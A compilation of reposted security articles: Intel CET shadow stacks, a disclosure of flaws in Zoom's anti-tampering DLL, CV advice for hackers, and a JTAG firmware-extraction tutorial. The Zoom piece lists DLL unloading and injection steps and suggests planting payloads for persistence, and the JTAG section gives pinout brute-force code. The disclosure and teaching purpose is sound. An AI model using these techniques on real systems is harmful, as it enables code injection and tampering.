CFG is the reason that several key zero-day attacks on Windows 7 didn't affect Windows 10. But, as Weston noted, 2015 is a long time ago in security terms, and CFG only addresses part of the problem. "Attackers have actually started to corrupt the stack, injecting their ROP frames or their malicious instruction sets."
By interfering with the execution flow when it returns to the main thread, rather than when it jumps forward, they can bypass CFG and execute their own code when the thread should go back. Call and return It's not that Microsoft didn't know that could happen; it's just harder to protect against and the best option is to do it in hardware, with a special register in the CPU that keeps a copy of the return address where it can't be tampered with. When the chunk of code with the return instruction runs, it can compare the address on the call stack in memory with the address on the 'shadow' stack stored on the processor to check that it hasn't been tampered with. Designing new CPU instructions takes time, and even once those ship it takes a while before people buy new hardware, so Microsoft did attempt to create a shadow stack in software. (This was far from the first attempt to create a shadow stack; there's one implemented in CLANG that Chrome used for a time.) Unusually, the approach which would have become Return Flow Guard was designed not by the usual software engineers but by the Windows red team -- the group that attacks internal and insider builds of Windows to look for vulnerabilities. But when the same team looked at how they could attack their own design, they found a race condition that meant some apps weren't protected and decided not to ship it at all. "The challenge with doing a shadow stack in software is that you have two choices: you can try to hide it, or you can try to put it in a place where the attacker can't write, and ultimately that comes down to if you can modify the page table or if you can locate it in memory if things go awry," Weston explained. "We attempted to hide it somewhere in 64-bit memory by wrapping it in guard pages, so if someone did like an iterative search through memory they would hit a guard space first and crash the process before finding the shadow stack." But on high-performance multi-threaded apps, attackers could sometimes make the kernel skip over the check to see if the return address matched the address on the shadow stack. "When we have to do it in software, we have to introduce 'no ops'; when you're entering and exiting the function, we pad them with blanks and so people are able to massage the memory, people are able to massage the race conditions of the system and skip the checks completely," Hari Pulapaka, principal group program manager of the Windows kernel team, explained. There's no race condition when the shadow stack is stored in hardware, so the checks don't get skipped. CET (Control-flow Enforcement Technology) completes the set of four protections against ROP (Return-oriented programming) that Microsoft has been working on for many years. Image: Microsoft Microsoft and Intel worked together on a design called Control-flow Enforcement Technology (CET) several years ago, which adds the new Shadow Stack Pointer (SSP) register and modifies the standard CPU call and return instructions to store a copy of the return address and compare it to the one in memory -- so most programs won't need any changes for compatibility. If the two addresses don't match, which means the stack has been interfered with, the code will stop running. "The shadow page table is assigned in a place that most processes or even the kernel cannot access, and this is supported by a new page table attribute that is not even exposed right now and people can't query it either," Pulapaka said. 
"The idea is that you will not be able to see that it exists, and you will not be able to touch it -- and if you try to touch it, the kernel doesn't allow it to allow any arbitrary process to touch it." SEE: 20 pro tips to make Windows 10 work the way you want (free PDF) (TechRepublic) CET also includes some forward call protection: indirect branch tracking does a similar check to CFG but in hardware. The CET specification was first released in 2016 and for compatibility, silicon released since then has had a non-functional version of the instruction that marks indirect branch addresses as safe. Intel confirmed to us that CET will be included in Tiger Lake CPUs this year, and in the next generation of Xeon for servers. AMD didn't give a date, but told us it will have the equivalent of CET soon. Arm is taking a different approach, using signed pointers. Compatible and secure Microsoft has already started building support into Windows 10, starting with 1903 and completing it in the upcoming 2004 release, so it's been showing up in fast ring insider builds. It's not enabled because the hardware isn't widely available yet, but it's there to test compatibility, Pulapaka explained. "When an insider build has all these checks going on inside the kernel, it gives us confidence we haven't broken anything and we haven't caused any bugs." To avoid compatibility worries with third-party software, CET stack protection will initially be opt-in on Windows. Developers do that by setting an attribute on an app or a DLL with a linker flag to mark it as CET-compatible. This has been done for all Windows code and libraries and, Pulapaka explained, "if somebody tries to attack Windows code and we trip the CET tripwire, we will bring down the process." If they don't set that bit, CET won't kick in, and even if developers set the bit for their own code, if they call a third-party framework or library that doesn't have the CET flag set and it crashes because it fails the CET address check, Windows won't stop the original application. "We're being a little conservative to avoid breaking apps," Pulapaka said. But Windows could also run in a strict mode. "If an app says it's CET-compatible even if the third-party DLL it loads is not CET-compatible, in that mode we would still do all the checks on that DLL and crash the process if somebody tries to attack that process." Microsoft hasn't yet decided how that mode would be applied because hardware isn't available for developers and enterprises to test applications on. "We would want to provide flexibility to everybody, so we would want the app to own the policy decision, we would want the enterprise to own the policy decision and we would want Microsoft to own the policy decision as well," said Pulapaka. "I think it is too early for us to say what we would turn on or off or force by default, because we don't yet have the hardware." Pulapaka expects compatibility problems with CET to be rare, but given the size of the Windows ecosystem some apps may run into problems. Those are most likely to be sophisticated tools like debuggers, JIT code generation tools, DRM, code obfuscators or anti-cheat engines for games, that rely on low-level assembly code. "If they have some weird code that tries to mess with the stack pointers, they could get tripped up. 
That's why we want to start with this more conservative approach and see how it goes; ninety-nine percent of the software world would probably not need to worry about whether their apps need some extra special testing with CET." When developers and enterprises have the right hardware to test on and do want to adopt CET, they can set the linker file in Visual Studio and use the same binary analysis tool that Microsoft uses to scan each Windows build to make sure that the CET flag is set on all code. Protecting code flow in hardware is the best option for security, and it ought to be better for performance than adding checks in Windows. Until Tiger Lake is available, it's impossible to give real figures but "it will certainly be way better than doing it in software because by definition, doing it hardware is much faster," Pulapaka told TechRepublic. That's important because the shadow stack is an important protection that we've been waiting several years for, to complete the list of Microsoft's four code protections. "These things are only truly effective when they're combined," Weston pointed out, "but when those protections are combined, we mitigate most of the in-the-wild techniques we see today. When it comes to the x86 landscape, we think CET is possibly the most important mitigation that's come online for memory corruption and zero day exploits, in the last several years." As always, improving protection in one area pushes attackers to switch techniques -- but this is still a big step forward. "Data corruption is emerging as the future path for attackers: we know internally that you can write an exploit that bypasses all four of these guards with pure data corruption," Weston said. "That doesn't mean CET isn't incredibly valuable, because that's a bit like open heart surgery and is going to be really disruptive for attackers, but we're already moving towards a post four-guards world where we've started to think about the next set of challenges around data corruption." Sursa: https://www.techrepublic.com/article/windows-10-security-how-the-shadow-stack-will-help-to-keep-the-hackers-at-bay/
-
Tampering with Zoom's Anti-Tampering Library ● 03 Apr 2020 Introduction This quick blog post highlights some of the flaws found in the Zoom application when attempting to do integrity checking, these checks verify that the DLLs inside the folder are signed by Zoom and also that no 3rd party DLLs are loaded at runtime. We can trivially disable this DLL, by replacing it with our own or simply unloading it from the process. This post highlights how we can bypass Zoom’s anti-tampering detection, which aims to stop DLLs from being loaded or existing ones modified. The functionality is all implemented by Zoom themselves within a DLL named DllSafeCheck.dll. I have also included a YARA rule at the end of this blog post, in case this technique is used by an advisory in the future. I’ll cover these flaws: The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL. Ironically while all the DLLs checked by the anti-tampering DLL MUST have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLLs integrity or signing status are NOT checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL. Zoom Client Zoom is entirely programmed in C++ and makes heavy use of the Windows API. The executable and the DLLs that are used are installed to %APPDATA%\Zoom\bin and is completely writeable. All of the executables that are used are signed by Zoom themselves, as we can see below when extracting the certificate. PS AppData\Roaming\Zoom\bin_00> Get-PfxCertificate util.dll Thumbprint Subject ---------- ------- 0F9ADA46756C17EFFFD467D10654E2A766566CB3 CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Pr... Most of the functionality within Zoom resides within the DLLs. Below, we can see the DLLs which are included within the export table. Take notice of the DllSafeCheck.dll; the is the library we will be analysing. Looking further at the use of DllSafeCheck.dll, we can see that it exports a function named HackCheck. If we then cross-reference the calls to this function using our favourite disassembler, IDA in this instance, we can see that it is called at the entry point of the program within WinMain before any other operations are completed. Below, we can see the function prologue and the immediate call to HackCheck. DllSafeCheck.dll As abovementioned, the Zoom client will call the HackCheck function (which is the only export from the DLL, apart from DllMain), upon execution. Two events are created to detect the loading and unloading of the DLL, by resolving LdrUnregisterDllNotification and LdrRegisterDllNotification to register it. To start, the export first starts by verifying that it is not running on an old version of Windows, using a mixture of VerSetConditionMask and VerifyVersionInfoW. After the Windows version has passed these checks, it will continue execution. It then will gather the Windows process token information through the usual means of getting a handle for the current process, then calling GetTokenInformation. This data is then saved for further use. A path to Zoom’s %APPDATA% folder is then constructed, and a log file named dllsafecheck.txt is created. A thread is then created, which waits for log events to be sent to it. Below, we can see the creation of this file. 
We then get to the core functionality of the DLL, which is scanning the modules loaded in the current process and making sure that they're signed by Zoom. It gathers a list of the modules and then checks whether they are signed. Below, we can see the enumeration of the certificate chain, which is checked against the hardcoded Zoom Video Communications, Inc. string.
if ( v10->csCertChain )
{
  do
  {
    v12 = WTHelperGetProvCertFromChain(v10, v11);
    if ( !v12 )
      break;
    v13 = v12->pCert;
    if ( v13 )
    {
      v15 = CertGetNameStringW(v13, 4u, 0, 0, 0, 0); // get alloc len
      v16 = v15;
      if ( v15 )
      {
        v14 = HeapAlloc(NULL, 0, 2 * v15);
        if ( v14 )
        {
          v20 = 0;
          do
          {
            v14[v20++] = 0;
          } while (v20 < (2 * v15));
          if (!CertGetNameStringW(v13, 4u, 0, 0, (LPWSTR)v14, v16))
          {
            HeapFree(NULL, 0, v14);
            v14 = 0;
          }
        }
        v10 = v26;
      }
      else
      {
        v14 = 0;
      }
    }
    else
    {
      v14 = 0;
    }
    if ( !v25 )
      v25 = L"Zoom Video Communications, Inc.";
If the executable is not signed by Zoom, the user is prompted and asked whether they want it to be run in the process.
Trivial to unload from process
Ironically, while all the DLLs checked by the anti-tampering DLL must have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLL's own integrity and signing status are not checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL.
An immediate issue is that this DLL can be trivially unloaded, rendering the anti-tampering mechanism null and void. The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread and call FreeLibrary after getting a handle to the DLL. One possible fix for this would be to call GetModuleHandleExA, passing in the GET_MODULE_HANDLE_EX_FLAG_PIN flag. This ensures that the module stays loaded within the process until it terminates, rendering FreeLibrary calls useless.
HMODULE hSafeCheck = NULL;
if (GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_PIN, "DllSafeCheck.dll", &hSafeCheck))
{
    // Loaded module successfully
}
We can unload it using the traditional and well-documented method of:
1) Get a HANDLE to the Zoom process using OpenProcess.
2) Enumerate the loaded modules in the process, using EnumProcessModules, and find a handle to DllSafeCheck.dll.
3) Resolve the address of "FreeLibrary" using GetProcAddress.
4) Create a thread in the process using CreateRemoteThread, with the starting routine as the FreeLibrary address and the parameter as the handle to DllSafeCheck.
5) The anti-tampering DLL is now unloaded.
6) We can now inject any DLL we want.
I've created a simple PoC (basic CreateRemoteThread DLL injection, nothing fancy) for unloading the anti-tampering DLL and injecting our own. You can contact me at me@syscall.party if you want to see it.
Anti-tampering DLL can be replaced on disk
When loading the DLL, Zoom does not check the signature or the integrity of the file. I'm not sure why this is not checked at all, considering all of the checks which are done in the DllSafeCheck DLL regarding executable signature verification. This remains a mystery. A threat actor could leverage this to have their unsigned, non-Zoom DLL loaded into the context of a signed executable as a host for their malicious code. The folder which Zoom resides in is writeable, which also contributes to this attack. A simple DLL named DllSafeCheck.dll can be compiled implementing the HackCheck export. For clarity, the malicious DLL which is used is not signed.
We can see the result of querying the executable signature below.
PS AppData\Roaming\Zoom\bin_00> Get-AuthenticodeSignature DllSafeCheck.dll

SignerCertificate  Status     Path
-----------------  ------     ----
                   NotSigned  DllSafeCheck.dll

The following code was used for this PoC:
VOID __declspec(dllexport) CheckHack()
{
    MessageBox(NULL, L"LloydLabs", L"Oops!", MB_APPLMODAL);
}
Here, we can see the alert when loading Zoom.
How could a threat actor realistically exploit this?
A malicious DLL could be bundled with Zoom and sent to a victim - this would result in the payload (e.g. Cobalt Strike) being executed under the context of the Zoom process. A threat actor could also abuse these issues to persist both across reboot and in memory on a target system; this is a much cleaner approach than the alternative of registering some startup event.
YARA rule
import "pe"

rule Zoom_Plant
{
    meta:
        date = "2020-04-03"
        author = "LloydLabs"
        url = "https://blog.syscall.party"
    condition:
        pe.characteristics & pe.DLL and pe.exports("HackCheck") and pe.number_of_exports == 1 and (pe.issuer contains "Zoom Video Communications, Inc.")
}
Conclusion
Thank you for reading this brief blog. If you wish to contact me, I can be emailed at me@syscall.party - I'm a 3rd-year undergraduate student and open to opportunities and collaboration. Cheers!
Sursa: https://blog.syscall.party/post/tampering-with-zooms-anti-tampering-library/
-
2020-04-04: How to document your knowledge (in a CV/resume) cv:resume:career From time to time I am asked to look at someone’s CV/resume and to suggest improvements. Usually, apart from o bunch of tips/comments, I give that person a link to a 10-year old blogpost of mine which enumerates things a programing/hacking enthusiast might have done and could include on their resume - some of them are obvious, others less so. Originally the blogpost was published in Polish; however, a few days ago I had it translated, I've updated it, and here we are - enjoy! Here’s the usual problem: how to document the knowledge acquired on your own? In the case of courses, studies, etc., that’s simple – we usually obtain a paper confirming the acquired qualifications: after graduation, it will be a graduation certificate, after a professional examination, it will be a technician diploma, after graduating from an university it will be a master's degree, engineering degree, etc., after completing a course or training, it will probably be a type of a certificate of completion. It goes without saying that we put the above certificates into our CVs, either in the Education section or in the section for “additional qualifications/skills”. However, the situation is not as clear if we acquired the knowledge ourselves. But it’s only seemingly so. The whole thing, in my opinion, comes down to publishing what you are doing - i.e. let's give the future employer a chance to see that we have actually gained some experience, even if we might have not been employed anywhere before (or at least not in these fields). What can be published if we learn programming, reverse engineering, or hacking/security? (If you still have some time before looking for a job, you can also treat this post as a list of things that could be done to strengthen your CV/resume) Apps, libraries, or smaller snippets of code (e.g. as a GitHub link). This point is both valid for project which were 100% done and have actual users, as well as for smaller apps that we wrote mostly for fun, and then got bored half way through implementation. However, do include only properly written code - neat, with comments, ideally even with accompanying documentation. And, to state the obvious, I wouldn't recommend including (or even creating in the first place) anything similar to “a new trojan stealing passwords from this-or-that-MMORPG and this-or-that-social-network, undetectable by anything on VirusTotal” – it can ruin one's chances with a lot of companies (e.g. ones from the antivirus industry). Articles or tutorials (published on our own website, on various sites, or in the industry press [thx Mariusz]). There are two advantages to publishing articles: firstly, we pass the knowledge on and give back to the larger community; and secondly, we prove that we have actually learned something. But remember that this is a double-edged sword! If the article is derivative (i.e. there are already 150 articles in our language on this topic), unreliable (full of errors), too chaotic, on a topic we will be ashamed of later (e.g. “how to steal a friend’s password to their mailbox”), or, oh the horror, is plagiarized, then we will get the exact opposite effect to the intended one. Lectures, talks, videos. This point is closely related to the previous one – just the medium is different. 
If we feel confident in a given topic (and actually have the grounds to be that) as well as with public presentations, we can try recording a set of training/tutorial videos or speaking at a conference. There are quite a few conferences out there – they are diverse in their topics, reach (local ones vs international ones) and in the level of talk (there are some that only accept original research, and quite a few where you can talk about anything interesting). Of course, in the event of an appearance (or recording), we need to ensure the quality of the lectures – both in technical content and making sure it’s interesting (counted in the number of people yawning, falling asleep or leaving the room). Participation in conferences. If we don't particularly see ourselves as a speaker, it's still worth to attend conferences. There are many new things we can learn, and we can say that we participated in such a conference. Networking is also important! Run a technical blog. By definition blogposts are a simpler and less refined medium than articles – therefore they can also be more diverse in topics. We can use blogs to publish updates on our current projects and endeavours, write about curious and interesting details we've seen, about problems we've encountered – how did we solve them, and also about new things we've learnt. As in previous cases, do care about the quality of the postings – try to write in an interesting way, care about details and the language, and avoid posing as an expert in areas new to you (especially when writing about new things you've learnt). Obviously, avoid publishing (and doing) things which could negatively affect your career (e.g. "How I stole 1000 passwords and sold them to the highest bidder"). Publish vulnerability advisories and case studies. Typically, when you find a vulnerability, an advisory and PoC exploit are written, sent to the vendor/maintainer, and eventually published – this is pretty much the norm in the industry. If you plan to look for a job as a pentester or security researcher, it is worth showing that you can actually find something. Also carefully consider the way you approach the process beforehand – there's an age-old dilemma whether to go for Full-Disclosure or Vendor-Coordinated-Disclosure (aka Responsible-Disclosure); the current norm seems to be some form of the latter (e.g. 90-day policy). All of the above things can be put in the CV. Personally, I have added sections to my CV like “Publications, lectures, projects worth mentioning, research worth mentioning” and I put there everything that I think is worth mentioning (running a blog is an exception here, and I personally put it in the 'interests' section). Over time, it will probably be a lot, so it is worth ignoring what is less interesting - the CV is, after all, to be quite concise and some say it's good if it does not exceed two pages (depends on the country / YMMV). It is important not to put anything in your CV that you don't really know. Job interviews at good companies are often designed to check whether what a person has written in the CV is actually true, so we can be sure we will be thoroughly grilled about everything that is written there. But if we've actually worked with what we put there, that shouldn't be too difficult. To look at it from another perspective: this is an extremely favorable situation – because not only do we know some of the questions up front – we've already learnt how to answer them! 
The first item on the above list (the one about publishing one's projects) actually extends even further - regardless of whether we decided to publish any of our projects, we need to have some code ready to show a potential employer if asked (in my personal experience this was a typical request I received until I reached senior level). Thankfully, while learning programming (a process that never actually stops) it's pretty typical to write a lot of code and to create small projects - so having something to show shouldn't pose a problem.

In the list above I have mentioned a few things that I use personally, but this is not an exhaustive list by any means! I encourage you to come up with other ideas for documenting your own knowledge and to share them in the comments. The list below contains other items that were suggested under the original blogpost.

(by Karton) Take part in open projects (e.g. open source). First, we can demonstrate our knowledge, and second, we help develop some interesting projects and gain experience in teamwork (even if it is limited to sending patches to the maintainer of the code).

(by Karton) Create a portfolio. A collective space where we publish what we have done.

(by michał) Certificates. After learning something on your own, you can try to get certified in that thing - i.e. pass an exam and have a lovely entry in your CV. I once heard that "in the west" some employers are big on certificates.

(by Gynvael) Take part in various competitions/challenges/hackathons/compos, etc., and ideally win them. There is no shortage of such competitions - different CTFs at conferences, challenges published by various companies, all kinds of algorithmic contests, and so on and so forth. The more prestigious the competition, the better.

(by myst) Internships for students. "Larger companies also organize a different kind of internship for students that can be held at their premises or remotely during the academic year. You can often find out about them in scientific circles or somewhere at the university. Participating in such internships is also, probably, a good way to document that you are doing 'something' ;>." I'll add that some companies also run open programming qualification tests and grant internships to the people who perform best. I encourage you to attempt such a test even if you don't manage to snatch the internship (because e.g. it is only for higher years and you are a first-year student).

(by y) Write and develop an application. A case similar to writing an application as I proposed above, but with an emphasis on the constant development/maintenance of one program. "Later in the conversation: 'Oh, you are the author of this program... We use it in the company.' You will definitely look good then."

(by Mariusz Kędziora) On the blog, make a list of the most important/most interesting entries. "You can sum up, for example, your blog (because the blog itself is a lot for a potential employer/co-worker to browse) - in a collection of the best and most interesting entries in your opinion."

(by Jurgi) Be active on forums. Employers and headhunters also browse thematic forums. If a user has meaningful posts, that can arouse their interest. "Similarly, being active on the forums (maybe it is worth adding?). In my case, it worked - it wasn't me who applied - it was the employer that came to me, because he wanted me to write for him."

(by Jurgi) Running workshops, zines, scientific circles, etc. "[...]
non-internet activity (conducting literary workshops, running several zines) resulted in me being accepted as an editor of a weekly, even though when I asked, there were no vacancies left."

(by Kele) A "portfolio" of solved tasks on pages with ongoing challenges (tasks, competitions, etc.). "I have recently received an email from the Polish SPOJ with a link to a survey. One of the questions was whether we would like the possibility to create a profile on the site that could be shown to a future employer. It's also some form of 'competition', but a more long-term one."

- to be continued

P.S. If you have been learning for a while (a few years) and after reading the above list nothing comes to your mind that you could put in your CV, you might want to stop and think carefully about whether there isn't anything you should change, adjust or improve in the way you go about learning hacking/programming.

Sursa: https://gynvael.coldwind.pl/?lang=en&id=728
-
02 Apr 2020

Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction

Background

To follow up on my last post about SWD and hardware debugging, I wanted to do a deep dive into JTAG from a reverse-engineering perspective. The previous post received a lot of great feedback and it seems that people are interested in this topic, so I wanted to continue the series and expand upon another hardware debugging mechanism. For those who are unfamiliar, JTAG is a hardware-level debugging mechanism that many embedded CPUs utilize. With this post I hope to explain how to approach JTAG from a reverse engineer's perspective and provide some practical examples along the way.

Goals

With this post, I hope to do the following:

Explain how JTAG works
Demonstrate how to discover and utilize a JTAG port/interface on an unknown target
Provide an overview of some of the current OSS tools that can be used to interact with a JTAG interface
Utilize JTAG to extract firmware and debug a target

Also, before I give an overview, I wanted to point out a few great resources for learning about JTAG:

Cyphunk's Embedded Analysis Page
FPGA4Fun JTAG Overview
Blackbox JTAG Reverse Engineering

JTAG Overview

JTAG is a hardware interface that was developed to assist developers and testers with low-level debugging. JTAG was originally developed for testing integrated circuits and, more specifically, for sampling IO pins on a target under test. This type of debugging interface allows engineers to test connections on PCBs without needing to probe the physical pin itself. The JTAG interface is controlled via the state machine outlined below:

One of the important things to remember about JTAG at this level is that it involves two registers, the instruction register and the data register. To utilize these registers, the proper states in the above state machine must be entered using the following interface signals:

Line   Usage
TMS    Used to navigate and control the JTAG state machine
TDI    Input pin, used to write data to the target
TDO    Output pin, used to read data back out of the target
TCK    Used to determine when data is sampled for all inputs and outputs
TRST   (Optional) Can be used to reset the state machine to the starting state

The state machine is navigated using the TMS and TCK lines, while data is written to or read from the target via TDI and TDO respectively. TMS is sampled on the rising edge of TCK, meaning that the TMS line must be asserted before TCK is toggled in order to navigate through the state machine. Data is then shifted into the instruction register (IR) or data register (DR), depending on the state of the JTAG state machine. When an operation is completed (or after the Update-DR/IR phase) the resulting data can be shifted out of DR by entering the Shift-DR state. With these primitives in place, manufacturers can implement whatever features they wish over JTAG. The JTAG standard treats IR and DR as shift registers, and because of this, multiple targets can be daisy-chained together.

In a nutshell, JTAG defines a state machine that is navigated with a minimum of 4 signals. With this state machine in place, end users can write to and read from two shift registers, IR and DR.

JTAG Registers

JTAG utilizes two main registers: the instruction register and the data register. The instruction register determines what function the JTAG controller is about to carry out, such as a memory read or a memory write, for example.
The data register is then used as an additional input to the instruction register; for the previous example, it might be used to provide an address to read from or write to. These registers can vary in size based on their function. To write to a register one would perform the following steps (we'll use the IR as an example):

1. Enter the Test Logic Reset (TLR) state (this can be done by asserting the TMS line and cycling TCK 5 times)
2. Enter the Select IR Scan state
3. Enter the Capture IR state
4. Enter the Shift IR state - this is where we load the data into IR from TDI
5. Enter the Exit IR state
6. Enter the Update IR state - this stage "latches" the value into IR

Following this, if no data register is required, the operation would be performed and the result (if any) would be loaded into the data register to be shifted out. However, many instructions require a data register to be filled out as well before operating. In that case, once the data register is written to and updated, the operation will be performed and the result can be shifted out of the data register. Some instructions do not require the DR to be loaded; for example, if we had loaded the IDCODE instruction into IR (1110b), this would load the processor's IDCODE value into the data register for us to then clock out and read on TDO. To read the result out on TDO, one would navigate to the Shift-DR state and clock in 32 bits on TDI; this would cause the data in the data register to be shifted out on the TDO line. See the image below for a visual representation of what happens when the IR is loaded with the IDCODE instruction.

It's important to remember that IR and DR can be thought of as shift registers, meaning that when we update them with new values, the old values are shifted out on TDO. The JTAG standard defines the following instructions:

BYPASS
This instruction connects TDI and TDO
In the Shift-DR state, data is transferred from TDI to TDO with a delay of one TCK cycle
0 is loaded into the data register during the Capture-DR state
This can be used to determine how many devices are in a scan chain

IDCODE
When loaded, the Device ID Code Register is selected as the serial path between TDI and TDO
In the Capture-DR state, the 32-bit device ID code is loaded into this shift section
In the Shift-DR state, this data is shifted out, least significant bit first

Core JTAG Concepts

The state machine is navigated with 4 signals: TCK, TMS, TDO and TDI
TDI is used to provide input, TDO is used for output
Using this state machine, data can be shifted into the IR (Shift-IR) and the DR (Shift-DR)
The instruction register (IR) can be thought of as a function, and the data register (DR) as the argument to that function
As data is shifted into DR and IR, the previous contents are shifted out on TDO
Once data is shifted into these registers, an operation can be performed (entirely dependent on the host implementation, aside from a few reserved instructions)
Data is read out of the target by shifting it onto TDO from the data register in the Shift-DR state

Now that we have gone over how JTAG works at a low level, we should talk about why we might care about it, and how this interface can grant access to useful features for reverse engineers. One of the most commonly used applications of the JTAG interface is hardware-level debugging (hence the title of this post).
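To make the state-machine mechanics above concrete, here is a minimal bit-banged sketch (assuming a Raspberry Pi with the RPi.GPIO library and hypothetical BCM pin assignments - adjust them for your own wiring). It resets the TAP, walks into Shift-DR, and clocks out the 32-bit IDCODE that most devices capture by default after reset:

import RPi.GPIO as GPIO

# Hypothetical BCM pin assignments - change these to match your wiring
TCK, TMS, TDI, TDO = 10, 9, 11, 25

def clock(tms, tdi=0):
    # One TCK cycle: drive TMS/TDI, sample TDO (still valid from the
    # previous falling edge), then pulse TCK
    GPIO.output(TMS, tms)
    GPIO.output(TDI, tdi)
    bit = GPIO.input(TDO)
    GPIO.output(TCK, 1)
    GPIO.output(TCK, 0)
    return bit

def read_idcode():
    for _ in range(5):              # five clocks with TMS high -> Test-Logic-Reset
        clock(1)
    clock(0)                        # Run-Test/Idle
    clock(1)                        # Select-DR-Scan
    clock(0)                        # Capture-DR
    clock(0)                        # Shift-DR (the captured IDCODE is now in the DR)
    idcode = 0
    for i in range(32):             # shift the DR out on TDO, LSB first
        idcode |= clock(1 if i == 31 else 0) << i   # TMS=1 on the last bit -> Exit1-DR
    clock(1)                        # Update-DR
    clock(0)                        # back to Run-Test/Idle
    return idcode

GPIO.setmode(GPIO.BCM)
GPIO.setup([TCK, TMS, TDI], GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(TDO, GPIO.IN)
print("IDCODE: 0x%08x" % read_idcode())
GPIO.cleanup()

Run against a known-good target (and with correct pins and logic levels), this should print the same kind of 32-bit IDCODE value that tools like JTAGEnum report.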
Hardware-level debugging is implemented by the chip manufacturer and can vary from chip to chip; however, one of the most common implementations for ARM targets is ARM's CoreSight Debug Interface. This is the same implementation that we communicated with over SWD in my last post, only in this case the Debug Access Port is communicated with over JTAG. The specifics of the JTAG implementation can be found here. Luckily for us, some excellent OSS tools can be used to communicate with these ports - this post will focus on using OpenOCD. OpenOCD takes care of utilizing the JTAG or SWD interface to grant the end user the various primitives that are provided by the debug interface exposed through the CoreSight DAP. The CoreSight/DAP architecture is fairly complicated and too much to cover in this (already long) post, so I will potentially save that for another post.

JTAG for Reverse Engineers

It's extremely important to have a solid understanding of the protocol fundamentals when approaching something like this from a reverse engineer's perspective. When reverse engineering hardware (or software) you want to have your ground truth covered, since there are always infinite unknowns. The next few sections will go over how we can take advantage of our low-level knowledge of these protocols to assist us on our path to gaining access to hardware-level debugging via JTAG. The first thing that we need to do is determine the pinout, and whether the exposed pins allow access to the JTAG interface.

Determining the pinout

JTAG signal lines are often grouped together, and sometimes (if you're extremely lucky!) you will see one of the standard headers pictured below. Even if you find something like this, however, it may not have the exact signal groupings, so we will discuss how to determine a pinout if one assumes it's used for JTAG. When reverse engineering something like this, you want to start with what you know. Since we know that most manufacturers implement at least IDCODE and BYPASS, let's talk about how we can take advantage of those two instructions. If you have identified what you believe to be a potential JTAG header or pinout, but do not know the pins, we can use the behavior of these two instructions to determine the pinout.

Since IDCODE is typically the instruction loaded into the IR by default after reset, one can test an assumed pinout by doing the following:

1. Assign roles to the candidate pins (TMS, TCK, etc.)
2. Enter the Test Logic Reset state
3. Enter Select DR Scan, Capture DR, then Shift DR
4. Clock 32 values on TDI and monitor TDO for a valid IDCODE value
5. Check the IDCODE value that you shifted out - if it looks valid, congratulations! Otherwise, reassign pins and repeat!

In addition to taking advantage of the fact that IDCODE is often loaded into the IR by default, we can also utilize the fact that both the IR and DR behave as shift registers. So, if we assume a common register length (32 bits often works), we can attempt to brute force the pinout by doing the following (a rough sketch of this scan in code follows below):

1. Assign roles to the candidate pins (TMS, TCK, etc.)
2. Using these assumed values, enter the Test Logic Reset state
3. Enter the Shift IR state
4. Shift in a unique 32-bit value on TDI
5. Continue to shift 1's on TDI while monitoring for your unique pattern on TDO (be sure to do this at least 32 times!). If the pattern is discovered, congratulations! Otherwise, choose new assignments for the pins and repeat!

Both of these methods are used by the previously mentioned JTAGEnum script, as well as the JTAGULATOR.
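To make the brute-force idea concrete, here is a rough sketch of such a pattern scan, again assuming a Raspberry Pi with RPi.GPIO and hypothetical candidate GPIO numbers; JTAGEnum and the JTAGULATOR implement far more robust versions of the same idea.

import itertools
import RPi.GPIO as GPIO

CANDIDATES = [2, 3, 9, 10, 11, 25]               # hypothetical BCM GPIOs wired to the unknown header
PATTERN = 0b10110011100011110000101101110001    # arbitrary 32-bit marker

def try_assignment(tck, tms, tdi, tdo):
    """Assume a pin mapping, enter Shift-IR and look for our pattern echoed on TDO."""
    GPIO.setup([tck, tms, tdi], GPIO.OUT, initial=GPIO.LOW)
    GPIO.setup(tdo, GPIO.IN)

    def clock(tms_val, tdi_val=1):
        GPIO.output(tms, tms_val)
        GPIO.output(tdi, tdi_val)
        bit = GPIO.input(tdo)        # TDO is valid since the previous falling edge
        GPIO.output(tck, 1)
        GPIO.output(tck, 0)
        return bit

    for _ in range(5):               # Test-Logic-Reset
        clock(1)
    for t in (0, 1, 1, 0, 0):        # Idle, Select-DR, Select-IR, Capture-IR, Shift-IR
        clock(t)

    seen = 0
    for i in range(32 + 64):         # 32 pattern bits plus padding for longer chains
        tdi_val = (PATTERN >> i) & 1 if i < 32 else 1
        seen = (seen >> 1) | (clock(0, tdi_val) << 31)
        if seen == PATTERN:          # pattern came back out on TDO -> plausible JTAG pins
            return True
    return False

GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
for tck, tms, tdi, tdo in itertools.permutations(CANDIDATES, 4):
    if try_assignment(tck, tms, tdi, tdo):
        print("Possible JTAG pinout: TCK=%d TMS=%d TDI=%d TDO=%d" % (tck, tms, tdi, tdo))
GPIO.cleanup()

In practice you would also want to try each remaining candidate pin as nTRST (held high) the way JTAGEnum does, and keep the clock slow - this sketch only shows the core of the pattern scan.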
Determining Instruction Length

Once you have determined the pinout of the target, the real fun can begin. The next step is to determine the length of the IR/DR. To do this, starting with the IR, enter the Shift IR state and flood the chain with 1's on TDI (using a large number like 1024 or 4096), and then clock in a 0. Once this has been done, simply continue to clock in 1's on TDI, counting the number of clock cycles it takes before a 0 appears on TDO. This will tell you the length of the IR. Once you have that, you can enter the Shift DR state and repeat the process to determine the length of the DR. This is something that UrJTAG does very well.

Practical Example: Samsung M.2 SSD

The target for this post is going to be a Samsung M.2 SSD that I recently recovered from an older laptop. After looking at the PCB and spotting what could potentially be JTAG headers, I wanted to outline the process from start to finish.

Practical Example: Locating JTAG Headers / Determining Pinout

